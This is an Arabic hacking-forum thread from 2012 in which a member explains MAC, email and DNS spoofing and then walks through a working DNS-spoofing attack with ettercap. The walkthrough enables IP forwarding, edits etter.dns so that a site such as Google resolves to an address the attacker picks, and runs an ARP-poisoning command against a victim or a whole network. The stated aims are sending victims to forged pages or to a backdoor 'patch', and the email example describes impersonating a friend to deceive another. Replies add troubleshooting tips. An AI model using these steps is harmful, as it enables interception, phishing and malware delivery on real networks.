قديم 03-05-2012, 12:19 PM   رقم المشاركة :1
Crime Investigator
 
الصورة الرمزية Black Tighr
افتراضي شرح مفصل للـ dns spoofing

السلام عليكم ورحمة الله وبركاته



كيف الحال جميعا اعضاء وزوار مجتمع بيت الهكرز الاخلاقي

اليوم بأذن الله سوف نبدأ في شرح الـ
dns spoofing بالتفصيل بأذن الله


================================================== ====

ماهو الـ
spoofing

السبوفينق هو انتحال شخصيه مهمه للوصول لغرض معين من الضحيه

مثلا انت تريد دخول جهاز ولكن لاتريد احد ان تعرف انك دخلت كيف ذلك

ذلك عن طريق الدخول بجهاز اخر او طريقة اخري بحيث لايستطيع احد تحديد هويتك

مثال :

انت تريد دواء معين لا يستطيع اخذ هذا الدواء الا الطبيب فقط

لانك انت صلاحياتك مريض لاتستطيع اخذ هذا الدواء

لذلك تقوم بأنحتال شخصية طبيب وتذهب وتأخذ الدواء بكل سهوله لانه صلاحيات الطبيب

تسمح له بذلك , هذا يسمي سبوفينق
spoofing

لسبوفينق عدة انواع ولكني في شرحي اليوم الا نوعين فقط فقط لكي يكون الشرح سلس .

================================================== ====

الاول ما يسمي بـ
spoofing mac address وهو اشهرها والمفضل لدي

حسنا الان ماهو السبوفينق ماك ادرس

مثال :

مثلا انت تريد الدخول الي سيرفر معين لكن لايمكنك ذلك لان صلاحياتك يوزر

والسيرفر يتعرف علي المدير بواسطة الماك ادرس فقط

في هذه الحاله الحل هو ان تدخل كمدير يعني تنسخ ماك ادرس المدير وتضعه لجهزك

وتدخل الي السيرفر بكل احترام طبعا نحن نعرف ان اماك ادرس مطبوع ولا يتكرر اقول لك

هنا يأتي دور السبوفينق هو يقوم بشئ اسمه فيرتيال
Virtual يعني ماك ادرس ظاهري فقط

سوف اضع لكم طريقة لتغيير الماك ادرس بكل سهوله ولكن شرحنا اليوم يركز علي السبوفينق فقط .

================================================== =

النوع الثاني مايسمي بــ
may spoofing

مثال :

مثلا لدينا ثلاثة اشخاص

الاول
Black Tighr

والثاني
ChiNeSe DraGoN

والثالث
Crazy Rabbit



انا
black tighr

انا اعلم انت
Crazy Rabbit و ChiNeSe DraGoN صديقان حميمان ويتواصلون

مع بعضهم ومعرفه يعني بينهم المهم يجب ان اعرف ايميل
ChiNeSe DraGoN لايهم الباسوورد

الايميل فقط ثم اذهب الي موقع يرسل رساله بأسم اي ايميل تريد والي اي شخص تريد

ويوجد العديد من هذه المواقع تقدم هذه الخدمه لن اذكرها لعدم العبث

المهم اخذ ايميل
ChiNeSe DraGoN واكتبه انه المرسل

ثم اضع ايميل
Crazy Rabbit المستقبل ثم اضع عنوان للرساله وضع محتوي الموضوع

اقول له يا العزيز
Crazy Rabbit اليوم راحه مافي اجتماع ولاشي ارتاح في بيتكم طبعا

الاخ
Crazy Rabbit سوف يقفل جواله ويشرب قهوه ويرتاح ثم بعد ذلك يتصل به ChiNeSe DraGoN

ويقول له اين انت تأخرت علي الاجتماع هنا يكتشف انه تعرض لعملية احتيال او سبوفينق
spoofing

ومن الذي قام بهذه العمليه هو الشخص الاول
Black Tighr ولن يكتشف احد الامر .

================================================== ======

الان بعد عرفنا ماهو السبوفينق وعرفنا نوعين شهرين منه سوف ننتقل الا الي

اهم شئ وهو
dns spoofing

مثال :

مثلا انا اعلم ان الشخص
Black Tighr دائما يدخل الي موقع الفيس بوك

وانا اريد تحويله الي صفحة اخري عند دخوله الي الفيس بوك الي اي صفحه اريد

يعني انا اريد بلاك تايقر عندما يدخل الي الفيس بوك يتحول مباشرة الي اي رابط اخر اريده انا

مثلا رابط باتش مرفوع مباشر يدخل الي جهاز تخترقه او منعه من دخول موقع معين

او جعله يدخل الي صفحة مزوره خاصه بك وهذا الاغلب .







 
التوقيع :
No money No honey No happiness

التعديل الأخير تم بواسطة Black Tighr ; 03-05-2012 الساعة 12:23 PM
   
قديم 03-05-2012, 01:17 PM   رقم المشاركة :2
Crime Investigator
 
الصورة الرمزية Black Tighr
افتراضي

الان ننتقل الي المرحلة المفضله لدي وهي التطبيق


نكتب هذا الامر ليعطيك الصلاحيات لعمل علي جميع البرامج التي نحتاجها

كود:
echo 1 > /proc/sys/net/ipv4/ip_forward




الان نقوم بكتابة امر ليقوم بجلب لنا الملف الذي سوف يتم التعديل عليه

كود:
locate etter.dns






ثم نكتب kate ليفتح لك الملف للتعديل عليه

طبعا المحرر kate غير مضاف الي الباك تراك لذلك نثبته بلأمر

كود:
  sudo apt-get install kate

ثم انتظر الي ان يتم تثبيت الاداه ثم اكتب

كود:
 kate /usr/share/ettercap/etter.dns


بعد ذلك سوف يفتح لك الملف الملطلوب التعديل عليه نبحث عن كلمة

كود:
# redirect it to www.linux.org


تحتها تماماً مانريد التعديل عليه

الان مثلا اريد من الشخص المقصود عندما يفتح موقع قوقل يفتح له موقع بيت الهكرز

نأخذ ايبي بيت الهكرز ونضعه في الملف مقابل رابط موقع القوقل وهذه الطريقة تستخدم ايضا

في هجمات ddos

المهم نري الصوره للتوضيح اكثر



بعد ان وضعنا الايبي للموقع الذي نريد توجيه الضحيه اليه ورابط موقع الذي نمنع دخوله اليه

نختار حفظ الملف ونغلقه , الان سوف نقوم بكتابة امر للتجسس وتشغيل التحويل

كود:
  ettercap -T -q -M arp:remote -P dns_spoof -i eth0 //




ومكان السلاشات ضع ايبي الضحيه الذي تريده او دعها هكذا لتكون علي الشبكة ككل

واخيرا اتمني ان لا اكون قد اطلت عليكم بالشرح

واقدمت احلي اهداء الي الاداره الكريمه

Crazy Rabbit و ChiNeSe DraGoN

علي المساعده في الشرح










 
التوقيع :
No money No honey No happiness

التعديل الأخير تم بواسطة Black Tighr ; 05-20-2012 الساعة 08:01 AM
   
قديم 03-05-2012, 05:12 PM   رقم المشاركة :3
FrEEdoM FightEr
 








Twitter 

ThirdNiN3 جيد


ThirdNiN3 غير متصل

افتراضي

بارك الله فيك , أستمر على هذا المنوال




 

التوقيع :
What is the Difference Between Freedom and Fedora ?
Absolutely nothing ... !! All of them begins With F Letter

___\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/___
*Sound oF *Freedom
You can be
Whatever u want
When you're high
Walk slowly
With a spirit by your side
Oh baby
___\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/___
Follow me in twitter 3rd9
   
قديم 03-05-2012, 05:46 PM   رقم المشاركة :4
عضو جديد
 










Saudi Hunterَ جيد


Saudi Hunterَ غير متصل

افتراضي

والله بطل وافكار توب

وعلى ما اعتقد كمان تسمى بالهندسه الاجتماعيه





 

   
قديم 03-05-2012, 06:06 PM   رقم المشاركة :5
عضو نشيط
 
الصورة الرمزية ServeR00T
 









Twitter 

ServeR00T جيد
إرسال رسالة عبر MSN إلى ServeR00T

ServeR00T غير متصل

افتراضي


يعطيك ألف عآفية أخوي مآ قصرت

آلشرح وآضح ومشيت بآلتطبيق لآخر خطوه عند آلأمر

ettercap -T -q -M arp:remote -P dns_spoof -i eth0 //
رد لي command not found أي لم يتم آلتعرف على آلأمر !!!!





 
التوقيع :

looking for more ..
   
قديم 03-05-2012, 06:28 PM   رقم المشاركة :6
Crime Investigator
 
الصورة الرمزية Black Tighr
افتراضي

اقتباس:
المشاركة الأصلية كتبت بواسطة server00t مشاهدة المشاركة

يعطيك ألف عآفية أخوي مآ قصرت

آلشرح وآضح ومشيت بآلتطبيق لآخر خطوه عند آلأمر

ettercap -t -q -m arp:remote -p dns_spoof -i eth0 //
رد لي command not found أي لم يتم آلتعرف على آلأمر !!!!

الله يعافيك يا الغالي

تأكد فقط من كتبة الحرف جيدا ولا انصحك بنسخ ولصق

ورد علي قولي لاني دائما اعمل بها علي البلاك اوبنتو بدون مشاكل

وجربته علي الباك تراك ايضا بدون مشاكل تأكد فقط

وللعلم قبل الشرطتين صفر وليس o




 
التوقيع :
No money No honey No happiness

التعديل الأخير تم بواسطة Black Tighr ; 03-05-2012 الساعة 06:32 PM
   
قديم 03-05-2012, 07:26 PM   رقم المشاركة :7
عضو نشيط
 











sami hack جيد


sami hack غير متصل

افتراضي

مخ نظيف وشرح سلس الى ابعد درجه

تستااهل احلى تقيييييييم




 

   
قديم 03-05-2012, 08:04 PM   رقم المشاركة :8
عضو نشيط
 
الصورة الرمزية ServeR00T
 









Twitter 

ServeR00T جيد
إرسال رسالة عبر MSN إلى ServeR00T

ServeR00T غير متصل

افتراضي


نعم أخوي .. أصلن كيف أنسخ وأنآ شغآل على جهآزين

تأكدت وعدتهآ حرف حرف ونفس آلنتيجة للعلم أستخدم BackTrack 5 R2

ممكن أن آلأدآه نفسهآ مآهي موجودة أو !!!!!!





 
التوقيع :

looking for more ..
   
قديم 03-05-2012, 08:26 PM   رقم المشاركة :9
Crime Investigator
 
الصورة الرمزية Black Tighr
افتراضي

ممكن فعلا تكون الاداه غير موجوده لاني استخدم باك تراك قديمه

ولكن سوف يدخل احد الاخوان ويقطع لنا الشك باليقين ويجرب عنده




 

التوقيع :
No money No honey No happiness
   
قديم 03-05-2012, 10:37 PM   رقم المشاركة :10
مؤسس المجتمع
 
الصورة الرمزية حسين يوسف
افتراضي

Black Tighr ، شرح رائع وتوضيح سليم جداً ، كإضافة فـ ( Spoofing ) تعني الخداع ..

شكراً لك

اقتباس:
المشاركة الأصلية كتبت بواسطة ServeR00T مشاهدة المشاركة

نعم أخوي .. أصلن كيف أنسخ وأنآ شغآل على جهآزين

تأكدت وعدتهآ حرف حرف ونفس آلنتيجة للعلم أستخدم BackTrack 5 R2

ممكن أن آلأدآه نفسهآ مآهي موجودة أو !!!!!!
ماعندي r2 ، لكن كل التوزيعات اللي قبلها فيها الاداة

أولاً عشان تشغّل الأداة لابد تكون root

اذا ما كنت داخل بالروت استخدم الأمر

sudo root

ثم نفّذ

ettercap -G

ثم جرب الامر الامر السابق

اذا لا زالت لاتعمل

نصّبها بواسطة الأمر

apt-get install ettercap

بالتوفيق




 
التوقيع :

"لايُهم كم تكتب، الأهم هو ماذا تكتب."
الحمد لله ..
إسألني
   


المتواجدين حالياً : 3 ( الأعضاء 0 والزوار 3)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم
انواع عرض الموضوع

 


الساعة الآن 03:54 AM


[ المواضيع والردود والمواد المنشورة لاتعبّر بالضرورة عن رأي إدارة المنتدى ، وإنما تعبّر عن رأي كاتبها فقط ويتحمّل صاحب المشاركة كامل المسؤولية عن أي مخالفة أو انتهاك لحقوق الغير ]
تنويه : الإدارة غير مسؤولة عن أي إتفاق تجاري يتم بين الأعضاء .